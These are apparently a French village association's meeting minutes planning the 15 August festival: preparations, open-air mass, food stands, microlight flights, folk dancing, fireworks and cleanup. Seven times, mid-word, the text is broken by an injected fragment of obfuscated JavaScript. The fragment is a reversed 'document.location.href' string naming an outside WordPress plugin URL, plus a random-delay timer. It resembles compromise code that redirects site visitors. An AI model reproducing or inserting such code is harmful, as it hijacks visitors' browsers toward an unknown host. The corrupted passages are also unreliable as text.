Lors de la réunion du 19 mai 2018, le Président Philippe Armand et les participants ont examiné le déroulement de la prochaine fête du 15 août.

La préparation débutera le samedi 11 à partir de 9 H pour la mise en place des stands, la récolte du buis, la décoration…
Un appel est lancé à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les bonnes volontés et un tableau affichera devant la buvette les tâches à effectuer.

Le jour du 15 août

Les mesures de sécurité ont été validées par la Gendarmerie Nationale qui sera bien présente.
La messe aura lieu en plein air le matin à 10h30.
Les stands des autres années seront reconduits :  Buvette, Vente de sandwiches, de frites et de gâteaux, Lavande, Jeux pour les enfants.
A midi la paella de Richard sera à nouveau proposée tandis que le soir le méchoui de Roro régalera les fêtards sans oublier les pizzas au feu de bois.
Toute la journée  le club des Engoulevents sera mobilisé pour des baptêmes en ULM au lieu-dit Saint Martin où se trouve la piste dédiée.
Outre le traditionnel concours de boules, un concours de pointage ouvert à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous sera aussi organisé.
L’après- midi quatre troupes folkloriques animeront le Charel.
A la toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombée de la nuit le feu d’artifice sera bien entendu le point d’orgue de la soirée et cette année des bracelets seront vendus en guise de souvenir.
Ensuite viendra le temps de la danse avec au choix  l’orchestre ORPHEA sous le chapiteau  ou ANIMMUSETTE dans la salle des fêtes.

Le jour du 16 août
Cette journée sera consacrée au rangement et au nettoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toyage et il est inutile de rappeler que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les bonnes volontés seront les bienvenues.

Heureusement le soir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les participants et leur famille seront conviés à un dîner dansant sous le chapiteau pour terminer cette période de fête en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute convivialité.